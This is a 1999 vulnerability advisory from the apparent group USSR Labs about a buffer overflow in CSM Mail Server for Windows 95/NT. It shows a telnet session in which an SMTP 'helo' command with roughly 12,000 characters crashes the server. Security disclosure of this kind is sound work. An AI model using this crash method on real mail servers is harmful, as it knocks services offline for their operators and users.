Local / Remote D.o.S Attack in  CSM Mail Server for Windows 95/NT
v.2000.08.A

USSR Advisory Code:   USSR-99027

Release Date:
December 29, 1999 [3/5]

Systems Affected:
CSM Mail Server for Windows 95/NT and others old versions.
Version: 2000-01A
Version: 1999-07M
Version: 1999-07I
Version: 1999-07H
Version: 1999-07G
Version: 1999-07F
Version: 1999-07b

About The Software:
CSM Mail Server for Windows 95/NT allows:
* FIREWALL is usefull to reject unwanted calls to the SMTP server.
* ANTI-SPAMMING is usefull to reject unwanted messages.
* To define VIRTUAL DOMAINS which are physically manage by the
  server itself.
* To define SECONDARY DOMAINS which are physically managed by the
  same or another server computer.
* To ROUTE (send or receive) messages between itself and the Internet.
* To ROUTE (send via SMTP) received message to the secondary domains.
* To TRANSFER (send or receive) messages between itself and the
  worktations attached to the local area network (LAN).
* To MANAGE the user mailboxes.
* To DISRIBUTE the messages in the mailboxes.
* It can be installed behind a Firewall or a CSM Proxy server.

THE PROBLEM

UssrLabs found a Local / Remote Buffer overflow,and  maybe remotely
exploitable buffer overflow,
the overflow is caused by a (long HELO) in the login procedure.

Example:
[hellme@die-communitech.net$ telnet example.com 25
Trying example.com...
Connected to example.com.
Escape character is '^]'.
220 SMTP CSM Mail Server ready at ServerName.com (Version 2000.08.A -
NT.4.0.1381)
helo [buffer]

Where [buffer] is aprox. 12000 characters. At his point the server overflows
and crashes.


Do you do the w00w00?
This advisory also acts as part of w00giving. This is another contribution
to w00giving for all you w00nderful people out there. You do know what
w00giving is don't you? http://www.w00w00.org/advisories.html

Vendor Status:
Informed.

Vendor   Url: http://www.csm-usa.com
Program Url: http://www.csm-usa.com/product/mailsrvr/

Credit: USSRLABS

SOLUTION
Noting yet :(

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and
Wiretrip.

About the Ussrback.com Web Page, yesterday we take the web site offline we
are moving to a new server,
the web still down for 2 days more (dns changes).

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com